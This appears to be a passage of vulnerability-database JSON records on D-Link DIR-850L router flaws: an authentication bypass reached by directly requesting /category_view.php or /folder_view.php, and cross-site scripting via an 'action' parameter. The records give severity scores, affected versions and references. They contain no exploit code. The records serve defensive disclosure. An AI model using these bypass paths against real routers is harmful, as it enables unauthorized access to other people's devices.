"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "An authentication bypass vulnerability on D-Link DIR-850L Wireless AC1200 Dual Band Gigabit Cloud Router (Hardware Version : A1, B1; Firmware Version : 1.02-2.06) devices potentially allows attackers to bypass SharePort Web Access Portal by directly visiting /category_view.php or /folder_view.php. D-Link DIR-850L The device contains an authentication vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. D-LinkDIR-850LWirelessAC1200DualBandGigabitCloudRouter is a wireless router product of D-Link. An authentication bypass vulnerability exists in the D-LinkDIR-850LWirelessAC1200DualBandGigabitCloudRouter. An attacker could exploit the vulnerability by bypassing the SharePortWebAccessPortal by directly accessing the /category_view.php or /folder_view.php file",
"sources": [
{
"db": "NVD",
"id": "CVE-2018-9032"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003365"
},
{
"db": "CNVD",
"id": "CNVD-2018-06792"
}
],
"trust": 2.16
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2018-9032",
"trust": 3.0
},
{
"db": "EXPLOIT-DB",
"id": "44378",
"trust": 2.4
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003365",
"trust": 0.8
},
{
"db": "CNVD",
"id": "CNVD-2018-06792",
"trust": 0.6
},
{
"db": "CNNVD",
"id": "CNNVD-201803-992",
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-06792"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003365"
},
{
"db": "NVD",
"id": "CVE-2018-9032"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-992"
}
]
},
"id": "VAR-201803-1970",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-06792"
}
],
"trust": 1.35
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT",
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-06792"
}
]
},
"last_update_date": "2023-12-18T13:08:32.596000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "Top Page",
"trust": 0.8,
"url": "http://us.dlink.com/about/"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-003365"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-287",
"trust": 1.8
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-003365"
},
{
"db": "NVD",
"id": "CVE-2018-9032"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.4,
"url": "https://www.exploit-db.com/exploits/44378/"
},
{
"trust": 2.2,
"url": "https://www.youtube.com/watch?v=wmm4p8zns3s"
},
{
"trust": 0.8,
"url": "https://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2018-9032"
},
{
"trust": 0.8,
"url": "https://nvd.nist.gov/vuln/detail/cve-2018-9032"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2018-06792"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003365"
},
{
"db": "NVD",
"id": "CVE-2018-9032"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-992"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2018-06792"
},
{
"db": "JVNDB",
"id": "JVNDB-2018-003365"
},
{
"db": "NVD",
"id": "CVE-2018-9032"
},
{
"db": "CNNVD",
"id": "CNNVD-201803-992"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-03-30T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-06792"
},
{
"date": "2018-05-23T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-003365"
},
{
"date": "2018-03-27T03:29:00.480000",
"db": "NVD",
"id": "CVE-2018-9032"
},
{
"date": "2018-03-28T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201803-992"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2018-03-30T00:00:00",
"db": "CNVD",
"id": "CNVD-2018-06792"
},
{
"date": "2018-05-23T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2018-003365"
},
{
"date": "2021-04-23T15:48:21.893000",
"db": "NVD",
"id": "CVE-2018-9032"
},
{
"date": "2021-04-25T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201803-992"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201803-992"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DIR-850L Authentication vulnerabilities in devices",
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2018-003365"
}
],
"trust": 0.8
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "authorization issue",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201803-992"
}
],
"trust": 0.6
}
}
VAR-201709-0587
Vulnerability from variot - Updated: 2023-12-18 13:02D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) devices have XSS in the action parameter to htdocs/web/wandetect.php. D-Link DIR-850L The device firmware contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. D-LinkDIR-850LREV.A is a wireless router from D-Link. A remote attacker could exploit the vulnerability to steal authentication cookies by sending an \342\200\230action\342\200\231 parameter to the htdocs/web/wandetect.php file
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201709-0587",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dir-850l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "fw114wwb07_h2ab"
},
{
"model": "dir-850l",
"scope": "lt",
"trust": 1.0,
"vendor": "dlink",
"version": "fw114wwb07_h2ab"
},
{
"model": "dir-850l",
"scope": "lte",
"trust": 0.8,
"vendor": "d link",
"version": "fw114wwb07_h2ab_beta1"
},
{
"model": "dir-850l rev.a \u003c=fw114wwb07 h2ab beta1",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "dir-850l",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "fw114wwb07_h2ab"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31793"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008097"
},
{
"db": "NVD",
"id": "CVE-2017-14416"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-579"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "fw114wwb07_h2ab",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:fw114wwb07_h2ab:beta1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-14416"
}
]
},
"cve": "CVE-2017-14416",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2017-14416",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2017-31793",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-105136",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.1,
"vectorString": "AV:N/AC:M/AU:N/C:N/I:P/A:N",
"version": "2.0"
}
],
"cvssV3": [
{
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 6.1,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "LOW",
"exploitabilityScore": 2.8,
"impactScore": 2.7,
"integrityImpact": "LOW",
"privilegesRequired": "NONE",
"scope": "CHANGED",
"trust": 1.0,
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.1"
},
{
"attackComplexity": "Low",
"attackVector": "Network",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 6.1,
"baseSeverity": "Medium",
"confidentialityImpact": "Low",
"exploitabilityScore": null,
"id": "CVE-2017-14416",
"impactScore": null,
"integrityImpact": "Low",
"privilegesRequired": "None",
"scope": "Changed",
"trust": 0.8,
"userInteraction": "Required",
"vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
"version": "3.0"
}
],
"severity": [
{
"author": "NVD",
"id": "CVE-2017-14416",
"trust": 1.8,
"value": "MEDIUM"
},
{
"author": "CNVD",
"id": "CNVD-2017-31793",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "CNNVD",
"id": "CNNVD-201709-579",
"trust": 0.6,
"value": "MEDIUM"
},
{
"author": "VULHUB",
"id": "VHN-105136",
"trust": 0.1,
"value": "MEDIUM"
}
]
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31793"
},
{
"db": "VULHUB",
"id": "VHN-105136"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008097"
},
{
"db": "NVD",
"id": "CVE-2017-14416"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-579"
}
]
},
"description": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/description#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) devices have XSS in the action parameter to htdocs/web/wandetect.php. D-Link DIR-850L The device firmware contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. D-LinkDIR-850LREV.A is a wireless router from D-Link. A remote attacker could exploit the vulnerability to steal authentication cookies by sending an \\342\\200\\230action\\342\\200\\231 parameter to the htdocs/web/wandetect.php file",
"sources": [
{
"db": "NVD",
"id": "CVE-2017-14416"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008097"
},
{
"db": "CNVD",
"id": "CNVD-2017-31793"
},
{
"db": "VULHUB",
"id": "VHN-105136"
}
],
"trust": 2.25
},
"external_ids": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/external_ids#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"db": "NVD",
"id": "CVE-2017-14416",
"trust": 3.1
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008097",
"trust": 0.8
},
{
"db": "CNNVD",
"id": "CNNVD-201709-579",
"trust": 0.7
},
{
"db": "CNVD",
"id": "CNVD-2017-31793",
"trust": 0.6
},
{
"db": "VULHUB",
"id": "VHN-105136",
"trust": 0.1
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31793"
},
{
"db": "VULHUB",
"id": "VHN-105136"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008097"
},
{
"db": "NVD",
"id": "CVE-2017-14416"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-579"
}
]
},
"id": "VAR-201709-0587",
"iot": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": true,
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31793"
},
{
"db": "VULHUB",
"id": "VHN-105136"
}
],
"trust": 1.7
},
"iot_taxonomy": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/iot_taxonomy#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"category": [
"IoT",
"Network device"
],
"sub_category": null,
"trust": 0.6
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31793"
}
]
},
"last_update_date": "2023-12-18T13:02:57.455000Z",
"patch": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/patch#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"title": "DIR-850L",
"trust": 0.8,
"url": "http://support.dlink.com/productinfo.aspx?m=dir-850l"
},
{
"title": "D-Link DIR-850L REV.A Fixes for cross-site scripting vulnerabilities",
"trust": 0.6,
"url": "http://123.124.177.30/web/xxk/bdxqbyid.tag?id=235004"
}
],
"sources": [
{
"db": "JVNDB",
"id": "JVNDB-2017-008097"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-579"
}
]
},
"problemtype_data": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/problemtype_data#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"problemtype": "CWE-79",
"trust": 1.9
}
],
"sources": [
{
"db": "VULHUB",
"id": "VHN-105136"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008097"
},
{
"db": "NVD",
"id": "CVE-2017-14416"
}
]
},
"references": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/references#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": [
{
"trust": 2.5,
"url": "https://pierrekim.github.io/blog/2017-09-08-dlink-850l-mydlink-cloud-0days-vulnerabilities.html"
},
{
"trust": 1.4,
"url": "https://nvd.nist.gov/vuln/detail/cve-2017-14416"
},
{
"trust": 0.8,
"url": "http://cve.mitre.org/cgi-bin/cvename.cgi?name=cve-2017-14416"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31793"
},
{
"db": "VULHUB",
"id": "VHN-105136"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008097"
},
{
"db": "NVD",
"id": "CVE-2017-14416"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-579"
}
]
},
"sources": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#",
"data": {
"@container": "@list"
}
},
"data": [
{
"db": "CNVD",
"id": "CNVD-2017-31793"
},
{
"db": "VULHUB",
"id": "VHN-105136"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008097"
},
{
"db": "NVD",
"id": "CVE-2017-14416"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-579"
}
]
},
"sources_release_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_release_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-10-27T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-31793"
},
{
"date": "2017-09-13T00:00:00",
"db": "VULHUB",
"id": "VHN-105136"
},
{
"date": "2017-10-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-008097"
},
{
"date": "2017-09-13T17:29:00.323000",
"db": "NVD",
"id": "CVE-2017-14416"
},
{
"date": "2017-09-18T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-579"
}
]
},
"sources_update_date": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources_update_date#",
"data": {
"@container": "@list"
}
},
"data": [
{
"date": "2017-10-27T00:00:00",
"db": "CNVD",
"id": "CNVD-2017-31793"
},
{
"date": "2017-09-20T00:00:00",
"db": "VULHUB",
"id": "VHN-105136"
},
{
"date": "2017-10-10T00:00:00",
"db": "JVNDB",
"id": "JVNDB-2017-008097"
},
{
"date": "2023-11-08T20:23:52.593000",
"db": "NVD",
"id": "CVE-2017-14416"
},
{
"date": "2023-04-27T00:00:00",
"db": "CNNVD",
"id": "CNNVD-201709-579"
}
]
},
"threat_type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/threat_type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "remote",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201709-579"
}
],
"trust": 0.6
},
"title": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/title#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "D-Link DIR-850L REV.A Cross-Site Scripting Vulnerability",
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31793"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-579"
}
],
"trust": 1.2
},
"type": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/type#",
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
}
}
},
"data": "XSS",
"sources": [
{
"db": "CNNVD",
"id": "CNNVD-201709-579"
}
],
"trust": 0.6
}
}
VAR-201709-0585
Vulnerability from variot - Updated: 2023-12-18 12:51D-Link DIR-850L REV. A (with firmware through FW114WWb07_h2ab_beta1) devices have XSS in the action parameter to htdocs/web/shareport.php. D-Link DIR-850L The device firmware contains a cross-site scripting vulnerability.Information may be obtained and information may be altered. D-LinkDIR-850LREV.A is a wireless router from D-Link. A remote attacker could exploit the vulnerability to steal authentication cookies by sending an \342\200\230action\342\200\231 parameter to the htdocs/web/wandetect.php file
Show details on source website{
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/VARIoTentry#",
"affected_products": {
"@id": "https://www.variotdbs.pl/ref/affected_products"
},
"configurations": {
"@id": "https://www.variotdbs.pl/ref/configurations"
},
"credits": {
"@id": "https://www.variotdbs.pl/ref/credits"
},
"cvss": {
"@id": "https://www.variotdbs.pl/ref/cvss/"
},
"description": {
"@id": "https://www.variotdbs.pl/ref/description/"
},
"exploit_availability": {
"@id": "https://www.variotdbs.pl/ref/exploit_availability/"
},
"external_ids": {
"@id": "https://www.variotdbs.pl/ref/external_ids/"
},
"iot": {
"@id": "https://www.variotdbs.pl/ref/iot/"
},
"iot_taxonomy": {
"@id": "https://www.variotdbs.pl/ref/iot_taxonomy/"
},
"patch": {
"@id": "https://www.variotdbs.pl/ref/patch/"
},
"problemtype_data": {
"@id": "https://www.variotdbs.pl/ref/problemtype_data/"
},
"references": {
"@id": "https://www.variotdbs.pl/ref/references/"
},
"sources": {
"@id": "https://www.variotdbs.pl/ref/sources/"
},
"sources_release_date": {
"@id": "https://www.variotdbs.pl/ref/sources_release_date/"
},
"sources_update_date": {
"@id": "https://www.variotdbs.pl/ref/sources_update_date/"
},
"threat_type": {
"@id": "https://www.variotdbs.pl/ref/threat_type/"
},
"title": {
"@id": "https://www.variotdbs.pl/ref/title/"
},
"type": {
"@id": "https://www.variotdbs.pl/ref/type/"
}
},
"@id": "https://www.variotdbs.pl/vuln/VAR-201709-0585",
"affected_products": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/affected_products#",
"data": {
"@container": "@list"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"model": "dir-850l",
"scope": "eq",
"trust": 1.0,
"vendor": "dlink",
"version": "fw114wwb07_h2ab"
},
{
"model": "dir-850l",
"scope": "lt",
"trust": 1.0,
"vendor": "dlink",
"version": "fw114wwb07_h2ab"
},
{
"model": "dir-850l",
"scope": "lte",
"trust": 0.8,
"vendor": "d link",
"version": "fw114wwb07_h2ab_beta1"
},
{
"model": "dir-850l rev.a \u003c=fw114wwb07 h2ab beta1",
"scope": null,
"trust": 0.6,
"vendor": "d link",
"version": null
},
{
"model": "dir-850l",
"scope": "eq",
"trust": 0.6,
"vendor": "d link",
"version": "fw114wwb07_h2ab"
}
],
"sources": [
{
"db": "CNVD",
"id": "CNVD-2017-31795"
},
{
"db": "JVNDB",
"id": "JVNDB-2017-008095"
},
{
"db": "NVD",
"id": "CVE-2017-14414"
},
{
"db": "CNNVD",
"id": "CNNVD-201709-581"
}
]
},
"configurations": {
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/configurations#",
"children": {
"@container": "@list"
},
"cpe_match": {
"@container": "@list"
},
"data": {
"@container": "@list"
},
"nodes": {
"@container": "@list"
}
},
"data": [
{
"CVE_data_version": "4.0",
"nodes": [
{
"children": [
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:*:*:*:*:*:*:*:*",
"cpe_name": [],
"versionEndExcluding": "fw114wwb07_h2ab",
"vulnerable": true
},
{
"cpe23Uri": "cpe:2.3:o:dlink:dir-850l_firmware:fw114wwb07_h2ab:beta1:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": true
}
],
"operator": "OR"
},
{
"children": [],
"cpe_match": [
{
"cpe23Uri": "cpe:2.3:h:dlink:dir-850l:-:*:*:*:*:*:*:*",
"cpe_name": [],
"vulnerable": false
}
],
"operator": "OR"
}
],
"cpe_match": [],
"operator": "AND"
}
]
}
],
"sources": [
{
"db": "NVD",
"id": "CVE-2017-14414"
}
]
},
"cve": "CVE-2017-14414",
"cvss": {
"@context": {
"cvssV2": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV2#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV2"
},
"cvssV3": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/cvss/cvssV3#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/cvssV3/"
},
"severity": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/cvss/severity#"
},
"@id": "https://www.variotdbs.pl/ref/cvss/severity"
},
"sources": {
"@container": "@list",
"@context": {
"@vocab": "https://www.variotdbs.pl/ref/sources#"
},
"@id": "https://www.variotdbs.pl/ref/sources"
}
},
"data": [
{
"cvssV2": [
{
"acInsufInfo": false,
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "NVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"severity": "MEDIUM",
"trust": 1.0,
"userInteractionRequired": true,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"acInsufInfo": null,
"accessComplexity": "Medium",
"accessVector": "Network",
"authentication": "None",
"author": "NVD",
"availabilityImpact": "None",
"baseScore": 4.3,
"confidentialityImpact": "None",
"exploitabilityScore": null,
"id": "CVE-2017-14414",
"impactScore": null,
"integrityImpact": "Partial",
"obtainAllPrivilege": null,
"obtainOtherPrivilege": null,
"obtainUserPrivilege": null,
"severity": "Medium",
"trust": 0.8,
"userInteractionRequired": null,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "CNVD",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "CNVD-2017-31795",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
"severity": "MEDIUM",
"trust": 0.6,
"vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N",
"version": "2.0"
},
{
"accessComplexity": "MEDIUM",
"accessVector": "NETWORK",
"authentication": "NONE",
"author": "VULHUB",
"availabilityImpact": "NONE",
"baseScore": 4.3,
"confidentialityImpact": "NONE",
"exploitabilityScore": 8.6,
"id": "VHN-105134",
"impactScore": 2.9,
"integrityImpact": "PARTIAL",
